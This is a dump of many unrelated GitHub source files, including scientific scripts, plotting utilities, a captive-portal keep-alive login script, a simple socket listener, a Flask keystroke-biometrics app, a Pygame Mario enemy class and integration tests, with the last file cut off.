[(x.decode('ascii'),y.decode('ascii')) for x,y in clashes]\n print('Clashes for pdb {} in residues {}'.format(name, clashes))\n\n save(os.path.join('distancesNHA', name), NHAdist)\n save(os.path.join('distancesSCC', name), SCCdist)\n save(os.path.join('distancesSCNHA', name), SCNHAdist)\n save(os.path.join('distancesCA', name), CAdist)\n save(os.path.join('distancesCB', name), CBdist)\n","repo_name":"ComputationalBiophysicsCollaborative/Kinase_Analysis","sub_path":"structure/getDists.py","file_name":"getDists.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70834090115","text":"import json\r\n\r\ntry:\r\n with open(\"logs.json\", \"r\") as file:\r\n logs = json.load(file)\r\nexcept FileNotFoundError:\r\n logs = {}\r\n\r\nlast_version = \"未公布\"\r\nlast_contrib = \"1304870761\"\r\n\r\nwhile True:\r\n version = input(f\"请输入版本号 ({last_version}): \") or last_version\r\n page = int(input(\"请输入页码: \"))\r\n update_type = int(input(\"请输入更新类型 (默认为0): \") or 0)\r\n contrib = input(\"请输入贡献��� (默认为空字符串): \") or last_contrib\r\n pre_text = input(\"请输入此前文本: \")\r\n post_text = input(\"请输入此后文本: \")\r\n\r\n last_version = version\r\n last_contrib 
= contrib\r\n \r\n new_entry = {\"page\": page, \"type\": update_type, \"contrib\": contrib, \"pre\": pre_text, \"post\": post_text}\r\n\r\n if version not in logs:\r\n logs[version] = []\r\n\r\n logs[version].append(new_entry)\r\n\r\n with open(\"logs.json\", \"w\") as file:\r\n json.dump(logs, file, indent=4)\r\n\r\n print(\"添加成功\")\r\n","repo_name":"Lawaxi/clayden_update","sub_path":"logs/appendAssistant.py","file_name":"appendAssistant.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"13363571953","text":"import matplotlib.pyplot as plt\nimport torch\nimport numpy as np\n\ndef show_key_points(image, keypoints, pred_keypoints=None):\n plt.imshow(np.squeeze(image), cmap=\"gray\")\n plt.scatter(keypoints[:, 0], keypoints[:, 1], s=20, marker='.', c='m')\n if pred_keypoints is not None:\n plt.scatter(pred_keypoints[:, 0], pred_keypoints[:, 1], s=20, marker='.', c='g')\n\ndef show_multiple_images(images, keypoints):\n fig = plt.figure()\n for i, image in enumerate(images):\n ax = fig.add_subplot(3,4,i+1, xticks=[], yticks=[])\n ax.imshow(np.squeeze(image), cmap=\"gray\")\n ax.scatter(keypoints[:, 0], keypoints[:, 1], s=20, marker='.', c='m')\n\n\ndef net_sample_output(test_loader, net):\n for i, sample in enumerate(test_loader):\n\n images = sample['image']\n key_pts = sample['keypoints']\n\n images = images.type(torch.FloatTensor)\n\n output_pts = net(images)\n\n output_pts = output_pts.view(output_pts.size()[0], 68, -1)\n\n if i == 0:\n return images, output_pts, key_pts\n\ndef denormalize_keypoints(keypoints):\n return ((keypoints*50)+100)\n\ndef show_all_keypoints(image, predicted_key_pts, gt_pts=None):\n \"\"\"Show image with predicted keypoints\"\"\"\n # image is grayscale\n plt.imshow(image, cmap='gray')\n plt.scatter(predicted_key_pts[:, 0], predicted_key_pts[:, 1], s=20, marker='.', c='m')\n # plot ground truth points as green pts\n if gt_pts is not None:\n plt.scatter(gt_pts[:, 0], gt_pts[:, 1], s=20, marker='.', c='g')\ndef visualize_output(test_images, test_outputs, gt_pts=None, batch_size=10):\n for i in range(batch_size):\n plt.figure(figsize=(20, 10))\n ax = plt.subplot(1, batch_size, i + 1)\n\n # un-transform the image data\n image = test_images[i].data # get the image from it's wrapper\n image = image.numpy() # convert to numpy array from a Tensor\n image = np.transpose(image, (1, 2, 0)) # transpose to go from torch to numpy image\n\n # un-transform the predicted key_pts data\n predicted_key_pts = test_outputs[i].data\n predicted_key_pts = predicted_key_pts.numpy()\n # undo normalization of keypoints\n predicted_key_pts = predicted_key_pts * 50.0 + 100\n\n # plot ground truth points for comparison, if they exist\n ground_truth_pts = None\n if gt_pts is not None:\n ground_truth_pts = gt_pts[i]\n ground_truth_pts = ground_truth_pts * 50.0 + 100\n\n # call show_all_keypoints\n show_all_keypoints(np.squeeze(image), predicted_key_pts, ground_truth_pts)\n\n plt.axis('off')\n\n plt.show()\n","repo_name":"aboelela924/CVND","sub_path":"facialKeyPointDetection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22539826324","text":"from configparser import ConfigParser\nimport time\n\nimport requests\n\nparser = ConfigParser()\nparser.read('login.ini')\nusername = parser.get('user', 'username')\npassword = parser.get('user', 'password')\nurl = 
'http://192.168.1.3:8090/login.xml'\nloginmode = 191\nlivemode = 192\ntimeout = 170\ndata = {\n    'mode': loginmode,\n    'username': username,\n    'password': password,\n    'a': str(time.time()),\n    'producttype': '0'\n}\ntry:\n    r = requests.post(url=url, data=data)\n    if(r.ok):\n        print('Login successful for ' + username)\n        while(True):\n            try:\n                r2 = requests.get(url='http://192.168.1.3:8090/live?mode=192&username=' +\n                                 username+'&a='+str(time.time())+'&producttype=0')\n                if(not r2.ok):\n                    print('An error occurred: ' + str(r) + ' Retrying...')\n                    try:\n                        r = requests.post(url=url, data=data)\n                    except:\n                        print(\"An unknown error occurred\")\n                    if(r.ok):\n                        print('Login successful for ' + username)\n            except:\n                print(\"An unknown error occurred\")\n            time.sleep(170)\n\n    else:\n        print('Login failed: Error code ' + str(r))\n        input('Press any key to continue...')\nexcept:\n    print('Login failed: An unknown error occurred')\n    input('Press any key to continue...')\n","repo_name":"Chirayu18/dotfiles","sub_path":"dot_config/nvim/executable_main.py","file_name":"executable_main.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"5421634718","text":"import socket\n\n# List of connected client sockets\ncliList = []\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Bind the IP and port; 0.0.0.0 binds to every network interface, but the port must not be in use\ns.bind(('0.0.0.0', 7786))\n\n# Start listening, with a maximum backlog of 10 connections\ns.listen(10)\n\n# Loop waiting for new connections, adding each connected socket to the list\nwhile True:\n    # Accept a new connection\n    sock, addr = s.accept()\n    # Add the new connection to the list\n    cliList.append(sock)\n    ## Test: display the IPs of the connected clients\n    for client_ip in cliList:\n        print(\"Client IP: \" + str(client_ip))\n","repo_name":"satan1a/DDoS_Attacket_v0.1","sub_path":"test/socket_server_test.py","file_name":"socket_server_test.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"zh","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"}
+{"seq_id":"29284939518","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nfrom compare import compare, getavg, movavg\nfrom pymongo import MongoClient\n\nimport os.path\nimport json\n\n\napp = Flask(\"Attackathon\")\nCORS(app)\n\nclient = MongoClient()\ndb = client.attackathon\n\n@app.route('/login', methods=['GET', 'POST'])\ndef attempt_login():\n    print(request.data)\n    return jsonify(\"This is the login.\")\n\n\ncost_threshold = 50\n\n\n@app.route('/compare', methods=['GET', 'POST'])\ndef attempt_compare():\n    reg = json.loads(request.data.decode(\"utf-8\"))\n    required = [\"data\", \"email\"]\n    for r in required:\n        if r not in reg:\n            return jsonify({\"error\": \"invalid request\"})\n\n    data, text = reg[\"data\"], reg[\"email\"]\n\n    obj = db.users.find_one({\"name\": text})\n    if obj is None:\n        return jsonify({\"error\": \"I could not find you :(\"})\n\n    register_avg = obj[\"data\"]\n\n    costs = compare(register_avg, data)\n\n    if \"blank\" not in costs:\n        return jsonify(costs)\n\n    blank, held = costs[\"blank\"], costs[\"held\"]\n\n    total_cost = 0.8 * blank + 0.2 * held\n    print(\"Costs: (%f, %f, %f)\" % (blank, held, total_cost))\n\n    if total_cost < cost_threshold:\n        n_avg = movavg(register_avg, data)\n        # filter on the user's name and store the new moving average\n        db.users.update({\"name\": text}, {\"name\": text, \"data\": n_avg})\n\n\n    return jsonify(total_cost < cost_threshold)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef attempt_register():\n    reg = json.loads(request.data.decode(\"utf-8\"))\n\n    required = [\"1\", \"2\", \"email1\", \"email2\"]\n    for r in required:\n        if r not in reg:\n            return jsonify({\"error\": \"invalid 
request\"})\n \n\n data1, data2 = reg[\"1\"], reg[\"2\"]\n\n tw1, tw2 = reg[\"email1\"], reg[\"email2\"]\n avg = getavg(data1, data2)\n\n if avg is None:\n return jsonify({\"error\": \"invalid request\"})\n\n # Word inputs must match\n if tw1 != tw2:\n return jsonify({\"error\": \"invalid text\"})\n\n db.users.update({\"name\": tw1}, {\"name\": tw1, \"data\": avg}, upsert=True)\n \n return jsonify({ \"good\": \"we're all good here\"})\n\n\n@app.route('/', defaults={'path': 'index.html'}, methods=['GET','POST'])\n@app.route('/')\ndef route_path(path):\n fname = 'docs/%s' % path\n\n # Option two: local file (one of Eric's) \n if os.path.isfile(fname):\n f = open(fname, \"r\")\n out = f.read()\n f.close()\n return out\n\n else:\n # Error\n print(request.data)\n return \"That page doesn't exist yet. You should make it.\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=443)\n","repo_name":"attackathon/keycore","sub_path":"chris/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568829391","text":"from itertools import groupby\nimport math\n\n\"\"\"\n I KNOW ITS SLOW BUT I WANTED TO TRY THIS SOLUTION ANYWAY\n\"\"\"\nFREE = False\nOCCUPIED = True\n\n\ndef get_stall_value(stalls, stall_index):\n left_free_space = right_free_space = 0\n tmp_index = stall_index\n\n while True:\n tmp_index -= 1\n if stalls[tmp_index] == OCCUPIED:\n break\n left_free_space += 1\n\n tmp_index = stall_index\n while True:\n tmp_index += 1\n if stalls[tmp_index] == OCCUPIED:\n break\n right_free_space += 1\n\n return left_free_space, right_free_space\n\n\ndef go_into_next_stall(stalls):\n final_index = 0\n\n grouped = groupby(stalls)\n max_len = 0\n for key, group in groupby(stalls):\n if key == FREE:\n max_len = max(max_len, len(list(group)))\n\n for key, group in grouped:\n group = list(group)\n group_len = len(group)\n if key == OCCUPIED or group_len != max_len:\n final_index += group_len\n else:\n final_index += int((group_len - 1) / 2)\n l_val, r_val = math.ceil((group_len - 1) / 2), math.floor((group_len - 1) / 2)\n break\n\n stalls[final_index] = OCCUPIED\n return l_val, r_val\n\n\ndef get_values(nbr_stalls, nbr_people):\n stalls = [FREE] * nbr_stalls\n stalls = [OCCUPIED] + stalls + [OCCUPIED]\n\n for people in range(nbr_people):\n l_val, r_val = go_into_next_stall(stalls)\n return l_val, r_val\n\n\ndef main():\n nbr_rows = int(input())\n\n for nbr_row in range(1, nbr_rows + 1):\n nbr_stalls, nbr_people = map(int, input().split())\n l_val, r_val = get_values(nbr_stalls, nbr_people)\n print(\"Case #{nbr_rows}: {l_val} {r_val}\".format(\n nbr_rows=nbr_row, l_val=l_val, r_val=r_val))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1935.py","file_name":"1935.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30225027136","text":"from numpy.linalg import inv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#2d case\nclass NDSphere:\n def __init__(self, center, radius):\n self.center = center\n self.radius = radius\n self.dim = center.shape[0]\n\n def generate_sample(self, N):\n\n vec = np.random.rand(N, self.dim) - 0.5\n vec = vec/np.linalg.norm(vec, axis=1, keepdims=True)\n return self.radius * vec + self.center.reshape(1, -1) + 0.1*np.random.randn(N, self.dim)\n\nsphere = 
NDSphere(np.array([3., 1.]),1.0)\n\ndata = sphere.generate_sample(100)\n\n# plt.plot(data[:,0], data[:,1], 'o')\n# plt.show()\n\ng = np.mean(data, axis=0, keepdims=False)\ng = np.hstack([g, np.zeros(1)]).reshape(-1, 1)\nH = - np.identity(sphere.dim + 1)\nH[-1, -1] = 1.0\nprint(g)\nprint(H)\n\nprint(inv(H) @ g)","repo_name":"DonghyunSung-MS/retarget_gui","sub_path":"test/est_sph.py","file_name":"est_sph.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43427318550","text":"#!/usr/bin/env python3\n\nimport os\nfrom dotenv import load_dotenv\n\nfrom bs4 import BeautifulSoup as bsp\nimport pickle\nimport pandas as pd\n\nif __name__ == '__main__':\n\n load_dotenv()\n\n l = pickle.load(open('{}voglist.txt'.format(os.getenv('BASE_PATH')), 'rb'))\n print(len(l))\n mainList = []\n \n for i in l:\n tempList = []\n soup = bsp(i, 'html.parser')\n for j in soup.children:\n try:\n for k in j.children:\n try:\n for m in k.children:\n try:\n for n in m.children:\n print(n)\n except:\n tempList.append(m)\n except:\n tempList.append(k)\n except:\n tempList.append(j)\n mainList.append(tempList)\n\n df = pd.DataFrame(mainList, columns = ['VOG number',\n 'Viral Quotient',\n 'Host Domain',\n 'Number of Proteins',\n 'Number of Genomes',\n 'Number of known Virus Families',\n 'Number of Known Virus Genera',\n 'Protein Annotations',\n 'Protein Annotations Mapping to POGs 2013'])\n\n writer = pd.ExcelWriter('{}pVOG.xlsx'.format(os.getenv('BASE_PATH')), engine = 'xlsxwriter') # pylint: disable=abstract-class-instantiated\n df.to_excel(writer, sheet_name = 'Sheet1', index = False)\n writer.save()\n","repo_name":"abhinavyesss/ProphageFinder","sub_path":"createvogdb.py","file_name":"createvogdb.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1565016692","text":"\n# local imports\nfrom text_data import *\n\ndef read_DS3505(filepath, has_headers = True):\n \"\"\"\n Text reader for DS3505 data (space delimited) with some fixes\n \n Weather data downloaded from the following website has a peculiarity\n [http://gis.ncdc.noaa.gov/map/viewer/#app=cdo&cfg=cdo&theme=hourly&layers=1&node=gi]\n in that it has some upercase T's that are rarely needed, but ruin otherwise\n uniform space formatting.\n\n :param filepath: filepath to DS3505 data\n :param has_headers: set False if filepath does not have headers. 
This doesn't seem\n to ever happen for DS3505 data.\n :return tdo: returns a text data object with DS3505 data in it.\n \"\"\"\n \n with open(filepath, 'r') as f:\n\n data = []\n\n if has_headers:\n headers = next(f).replace('\\n','').split(' ')\n headers = [x for x in headers if x != \"\"]\n else:\n headers = None\n\n for line in f:\n entry = line.replace(\"T\",\" \").replace(\"\\n\",\"\").split(' ')\n entry = [x for x in entry if x!= \"\"] # remove empties\n data.append(entry)\n f.close()\n \n print(\"Loaded data from '{0}'\".format(filepath))\n\n # assemble the text data object and return it\n tdo = text_data(text_filepath = filepath,\n headers = headers,\n row_data = data)\n \n return tdo\n","repo_name":"NASA-DEVELOP/dnppy","sub_path":"dnppy/textio/read_DS3505.py","file_name":"read_DS3505.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"61"} +{"seq_id":"11536394766","text":"from django.core.management.base import BaseCommand\nimport csv\n\nfrom social_balance.models import BalanceProcess\nfrom social_balance.models.balance import EntitySocialBalance\nfrom accounts.models.account import Entity, Provider, Colaborator\n\n\ndef get_social_balance_statuses(entity, years):\n statuses = []\n for year in years:\n sb = EntitySocialBalance.objects.filter(entity=entity, year=year).first()\n if sb:\n if sb.done:\n status = 'REALIZADO'\n elif sb.is_exempt:\n status = 'EXENTA'\n else:\n status = 'NO REALIZADO'\n statuses.append(status)\n else:\n statuses.append(\"\")\n\n return statuses\n\n\ndef get_sponsor_last_year(entity, year):\n last_process = BalanceProcess.objects.filter(account=entity, year=year).first()\n if last_process and last_process.sponsor:\n sponsor = last_process.sponsor.first_name + \" \" + last_process.sponsor.last_name\n else:\n sponsor = \"\"\n return sponsor\n\n\ndef get_type_entity(entity):\n if isinstance(entity, Provider):\n return 'Proveedora'\n elif isinstance(entity, Colaborator):\n if entity.is_sponsor:\n return \"Patrocinadora\"\n elif entity.is_collaborator:\n return \"Colaboradora\"\n\n return \"\"\n\n\nclass Command(BaseCommand):\n help = 'Export list of entities with social balace status of last years'\n\n def add_arguments(self, parser):\n\n parser.add_argument('year_start', type=int, help='Year start')\n parser.add_argument('year_end', type=int, help='Year end')\n\n def handle(self, *args, **options):\n\n year_start = options['year_start']\n year_end = options['year_end']\n\n years = list(range(year_start, year_end + 1))\n\n headers = ['Nombre', 'Email', 'Telefono', 'Tipo', 'Año de constitución',\n 'Fecha de alta MES', 'Madrina ultimo año'] + years\n data = []\n\n entities = Entity.objects.active()\n\n print(f'Active entities: {len(entities)}')\n\n for entity in entities:\n name = entity.name\n email = entity.contact_email\n phone = entity.contact_phone\n start_year = entity.start_year\n registration_date = str(entity.registration_date)\n\n sponsor = get_sponsor_last_year(entity, years[len(years) - 1])\n entity_type = get_type_entity(entity)\n\n sb = get_social_balance_statuses(entity, years)\n\n data.append([name, email, phone, entity_type, start_year, registration_date, sponsor] + sb)\n\n with open('balances_sociales.csv', 'w') as f:\n write = csv.writer(f, delimiter=';')\n write.writerow(headers)\n write.writerows(data)\n\n 
print(\"Exported\")\n\n\n","repo_name":"Mercado-Social-de-Madrid/gestionMES","sub_path":"currency/management/commands/export_social_balance_history.py","file_name":"export_social_balance_history.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"18484697115","text":"from pathlib import Path\nimport re\nimport itertools\n\npuzzle_input_path = Path(__file__).parent / \"input.txt\"\n\nwith open(puzzle_input_path) as puzzle_input_file:\n puzzle_input_raw = puzzle_input_file.read() \n\nmoons_coords = [tuple(int(x) for x in re.findall(r\"\\w=([0-9-]+)\", m)) for m in puzzle_input_raw.splitlines()]\nmoons_velocities = [(0, 0, 0) for _ in range(len(moons_coords))]\n\ncmp = lambda x, y: (x > y) - (x < y)\napply = lambda x, y: tuple(map(sum, zip(x, y)))\napply_list = lambda x, y: [apply(c, v) for c, v in zip(x, y)]\n\n\ndef time_step(moons_coords, moons_velocities):\n # apply gravity\n for (moon_idx, moon_coords), (other_moon_idx, other_moon_coords) in itertools.combinations(enumerate(moons_coords), 2):\n gravity_delta = tuple(itertools.starmap(cmp, zip(moon_coords, other_moon_coords)))\n moons_velocities[moon_idx] = apply(moons_velocities[moon_idx], tuple(x * -1 for x in gravity_delta))\n moons_velocities[other_moon_idx] = apply(moons_velocities[other_moon_idx], gravity_delta)\n\n # apply velocity\n return apply_list(moons_coords, moons_velocities), moons_velocities\n\n\nfor _ in range(1_000):\n moons_coords, moons_velocities = time_step(moons_coords, moons_velocities)\n\ne_pots = [sum(map(abs, m)) for m in moons_coords]\ne_kins = [sum(map(abs, v)) for v in moons_velocities]\ne_tot = sum(p * k for p, k in zip(e_pots, e_kins))\nprint(e_tot)","repo_name":"timofurrer/aoc","sub_path":"2019/12/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13030557957","text":"#编写者:cwt\n#时间:2022/7/4 21:17\n#敌人\n\nimport pygame\nfrom source import setup,tools,constants\nfrom source.components import box\n\n'''myself'''\n# class Enemy(pygame.sprite.Sprite):\n# def __init__(self,x,y,direction,type,color=None):\n# pygame.sprite.Sprite.__init__(self)\n# self.x=x\n# self.y=y\n# self.direction=direction\n# self.type=type\n# self.frame_index=0 #帧图片索引,用来切换帧\n# self.frames=[] #存储将要切换的帧图片\n# frame_rects={\n# (0,16,16,16),\n# (16,16,16,16)\n# } #循环使用两帧实现相互切换\n# #self.image=tools.get_image(setup.GRAPHICS['enemies'],0,16,16,16,(0,0,0),2.5)\n# self.load_frames(frame_rects)\n#\n# self.image=self.frames[self.frame_index]\n#\n# self.rect=self.image.get_rect()\n# self.rect.x=self.x\n# self.rect.bottom=self.y\n# self.timer = 0 # 计时器\n#\n#\n# def load_frames(self, frame_rects):\n# sheet = setup.GRAPHICS['enemies']\n# for frame_rect in frame_rects:\n# self.frames.append(\n# tools.get_image(sheet, *frame_rect, (0, 0, 0), 2.5)) # *frame_rect解包,把该元组放入时分解成四个变量\n# print(self.frames)\n# def update(self):\n# self.current_time = pygame.time.get_ticks() # 获取当前时间\n# frame_durations = [125, 125] # 停留时间\n#\n# if self.timer == 0:\n# self.timer = self.current_time\n# elif self.current_time - self.timer > frame_durations[self.frame_index]:\n# self.frame_index += 1\n# self.frame_index %= 2\n# self.timer = self.current_time\n#\n# self.image = self.frames[self.frame_index]\n\ndef create_enemy(enemy_data):\n\n enemy_type=enemy_data['type']\n x,y,direction,color = 
enemy_data['x'],enemy_data['y'],enemy_data['direction'],enemy_data['color']\n #print('11')\n if enemy_type ==0: #Goomba 蘑菇怪\n enemy=Goomba(x,y,direction,\"gooba\",color)\n #print(enemy)\n elif enemy_type ==1: #Koopa 乌龟\n #print('99')\n enemy=Koopa(x,y,direction,\"koopa\",color)\n else:\n # print('99')\n enemy = Koopa(x, y, direction, \"koopa\", color)\n\n return enemy\nclass Enemy(pygame.sprite.Sprite):\n def __init__(self,x,bottom_y,direction,name,frame_rects):\n pygame.sprite.Sprite.__init__(self)\n #print('33')\n\n self.direction=direction\n self.name=name\n self.frame_index = 0\n self.left_frames=[]\n self.right_frames=[]\n self.load_frames(frame_rects)\n self.frames=self.left_frames if self.direction ==0 else self.right_frames\n # print(self.frames)\n self.image=self.frames[self.frame_index]\n #print(self.image)\n self.rect=self.image.get_rect()\n self.rect.x=x\n self.rect.bottom=bottom_y\n \n self.timer = 0 # 计时器\n self.x_vel = -1 *constants.ENEMY_SPEED if self.direction == 0 else constants.ENEMY_SPEED #如果野怪面朝左,就让它有一个向左的速度,否则反之\n self.y_vel = 0\n self.gravity = constants.GRAVITY\n self.state = 'walk'\n\n def load_frames(self,frame_rects):\n for frame_rect in frame_rects:\n left_frame=tools.get_image(setup.GRAPHICS['enemies'],*frame_rect,(0,0,0),constants.ENEMY_MULTI)\n right_frame=pygame.transform.flip(left_frame,True,False) #第一个参数图像,第二个是否水平翻转,第三个是否垂直翻转\n self.left_frames.append(left_frame)\n self.right_frames.append(right_frame)\n\n def update(self,level):\n '''适用于间隔时间不同'''\n # self.current_time = pygame.time.get_ticks() # 获取当前时间\n # frame_durations = [125, 125] # 停留时间\n #\n # if self.timer == 0:\n # self.timer = self.current_time\n # elif self.current_time - self.timer > frame_durations[self.frame_index]:\n # self.frame_index += 1\n # self.frame_index %= 2\n # self.timer = self.current_time\n #\n # self.image = self.frames[self.frame_index]\n self.current_time=pygame.time.get_ticks()\n self.handle_states(level)\n self.update_position(level) #位置更新\n\n\n def handle_states(self,level): #使用状态机处理野怪状态\n\n if self.state == 'walk':\n self.walk()\n elif self.state == 'fall':\n self.fall()\n elif self.state == 'die':\n self.die()\n elif self.state == 'trampled': #踩踏\n self.trampled(level)\n elif self.state == 'slide': # 滑行\n self.slide()\n if self.direction:\n self.image = self.right_frames[self.frame_index]\n else:\n self.image = self.left_frames[self.frame_index]\n\n def walk(self):\n if self.current_time - self.timer >125:\n self.frame_index=(self.frame_index+1)%2\n self.image=self.frames[self.frame_index]\n self.timer=self.current_time\n def fall(self):\n # if self.y_vel <10:\n self.y_vel += self.gravity\n def die(self):\n\n self.rect.x += self.x_vel\n self.rect.y += self.y_vel\n self.y_vel += self.gravity\n if self.rect.y > constants.SCREEN_H:\n self.kill()\n def trampled(self,level):\n pass\n def slide(self):\n pass\n\n def update_position(self,level):\n self.rect.x += self.x_vel\n self.check_x_collisions(level) #x方向碰撞检测\n self.rect.y += self.y_vel\n if self.state != 'die':\n self.check_y_collisions(level)#y方向碰撞检测\n def check_x_collisions(self,level):\n sprite = pygame.sprite.spritecollideany(self,level.ground_items_group)\n if sprite:\n #self.direction =1 if self.direction == 0 else 0\n if self.direction: #向右\n self.direction =0\n self.rect.right = sprite.rect.left\n else:\n self.direction = 1\n self.rect.left = sprite.rect.right\n self.x_vel *=-1\n\n if self.state =='slide':\n enemy =pygame.sprite.spritecollideany(self,level.enemy_group)\n if enemy:\n 
enemy.go_die(how='slided',direction=self.direction)\n level.enemy_group.remove(enemy)\n level.dying_group.add(enemy)\n\n\n def check_y_collisions(self,level):\n #print('yyys')\n check_group= pygame.sprite.Group(level.ground_items_group,level.brick_group,level.box_group)\n sprite = pygame.sprite.spritecollideany(self,check_group)\n if sprite:\n #print('野怪头部{0},野怪脚底{2},碰撞物体头部{3}',self.rect.top,self.rect.bottom,sprite.rect.top)\n if self.rect.top < sprite.rect.top: # ??从上往下掉落 已解决:坐标轴原因\n self.rect.bottom =sprite.rect.top\n self.y_vel = 0\n self.state='walk'\n level.check_will_fail(self)\n\n def go_die(self,how,direction=1):\n #self.kill()\n self.death_time = self.current_time\n if how in ['bumped','slided']: #各种死因\n self.x_vel =constants.ENEMY_SPEED * direction\n self.y_vel=-8\n self.gravity=0.5\n self.state='die'\n self.frame_index=2\n elif how=='trampled':\n self.state='trampled'\n\n\n\n\n\n\n\nclass Goomba(Enemy):\n def __init__(self,x,y,direction,name,color):\n #print('22')\n\n bright_rect_frames = [(0, 16, 16, 16), (16, 16, 16, 16),(32,16,16,16)]\n daek_rect_frames = [(0, 48, 16, 16), (16, 48, 16, 16),(32,48,16,16)]\n\n if not color:\n frame_rects = bright_rect_frames\n else:\n frame_rects = daek_rect_frames\n Enemy.__init__(self,x,y,direction,name,frame_rects)\n\n def trampled(self,level):\n self.x_vel = 0\n self.frame_index = 2\n if self.death_time == 0 :\n self.death_time == self.current_time\n if self.current_time - self.death_time >500: #野怪死亡500毫秒\n self.kill()\n\n\nclass Koopa(Enemy):\n def __init__(self, x, y, direction, name, color):\n #print('44')\n\n bright_rect_frames = [(96, 9, 16, 22), (112, 9, 16, 22), (160, 9, 16, 22)]\n daek_rect_frames = [(96, 9, 16, 22), (112, 9, 16, 22), (160, 9, 16, 22)]\n\n if not color:\n frame_rects = bright_rect_frames\n else:\n frame_rects = daek_rect_frames\n Enemy.__init__(self,x, y, direction, name, frame_rects)\n\n '''龟壳长时间不去撞击,乌龟会重新钻出来'''\n self.shell_timer = 0\n\n\n def trampled(self,level):\n self.x_vel = 0\n self.frame_index = 2\n # if self.death_time == 0 :\n # self.death_time == self.current_time\n # if self.current_time - self.death_time >500: #野怪死亡500毫秒\n # self.kill()\n\n if self.shell_timer ==0:\n self.shell_timer =self.current_time\n if self.current_time -self.shell_timer >5000:\n self.state='walk'\n self.x_vel = -constants.ENEMY_SPEED if self.direction ==0 else constants.ENEMY_SPEED\n level.enemy_group.add(self) #加入乌龟组\n level.shell_group.remove(self)\n self.shell_timer =0\n def slide(self):\n pass\n\n","repo_name":"cwt2022/Mario","sub_path":"source/components/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":9476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"34741036859","text":"from core.common.utilities.helpers import ensure_id\nfrom tests.integration_tests.utilities.data_access_misc_queries import insert_test_company, insert_test_store, insert_test_rir, insert_test_company_competition_instance\nfrom tests.integration_tests.framework.svc_test_collection import ServiceTestCollection\nfrom common.utilities.inversion_of_control import Dependency\nfrom common.service_access.utilities.errors import ServiceCallError\nfrom bson.objectid import ObjectId\n\n\n__author__ = \"vgold\"\n\n\nclass WFSCleanupTasksTestCollection(ServiceTestCollection):\n\n def initialize(self):\n\n # get params builder\n self.main_params = Dependency(\"CoreAPIParamsBuilder\").value\n\n # context\n self._context = {\n \"user_id\": ObjectId(),\n \"source\": 
\"wfs_cleanup_tasks_test_collection.py\"\n }\n\n def setUp(self):\n\n self.mds_access.call_delete_reset_database()\n\n def test_most_correct_rir_fixer(self):\n\n cid = insert_test_company(type=\"retail_banner\")\n\n sid1 = insert_test_store(cid, [None, None])\n sid2 = insert_test_store(cid, [None, None])\n sid3 = insert_test_store(cid, [None, None])\n sid4 = insert_test_store(cid, [None, None])\n sid5 = insert_test_store(cid, [None, None])\n\n rid1 = insert_test_rir(self.context, cid, is_most_correct=True)\n rid2 = insert_test_rir(self.context, cid)\n rid3 = insert_test_rir(self.context, cid)\n rid4 = insert_test_rir(self.context, cid, is_most_correct=True)\n rid5 = insert_test_rir(self.context, cid)\n\n self._link_rir_to_store(rid1, sid1, is_most_correct=True)\n self._link_rir_to_store(rid2, sid2, is_most_correct=True)\n self._link_rir_to_store(rid3, sid3, is_most_correct=True)\n self._link_rir_to_store(rid4, sid4)\n self._link_rir_to_store(rid5, sid5)\n\n # rub, baby, run!\n task_rec = {\n \"input\": { \"scheduled\": False },\n \"meta\": { \"async\": False }\n }\n self.main_access.wfs.call_task_new(\"retail_curation\", \"cleanup\", \"most_correct_rir_fixer\", task_rec, self.context)\n\n # verify each rir is now correct... oy vey.\n self._verify_rir(rid1, True)\n self._verify_rir(rid2, True)\n self._verify_rir(rid3, True)\n self._verify_rir(rid4, False)\n self._verify_rir(rid5, False)\n\n def test_orphan_task_fixer(self):\n\n # create two test RIRs\n company_id = insert_test_company()\n rir1_id = insert_test_rir(self.context, company_id)\n rir2_id = insert_test_rir(self.context, company_id)\n\n # create validation tasks for the test RIRs\n tasks = []\n for rir_id in [rir1_id, rir2_id]:\n validation_task_rec = {\n \"input\": {\"target_rir_id\": rir_id},\n \"meta\": {\"async\": False}\n }\n task = self.wfs_access.call_task_new(\"retail_curation\", \"input_sourcing\", \"churn_validation\",\n validation_task_rec, 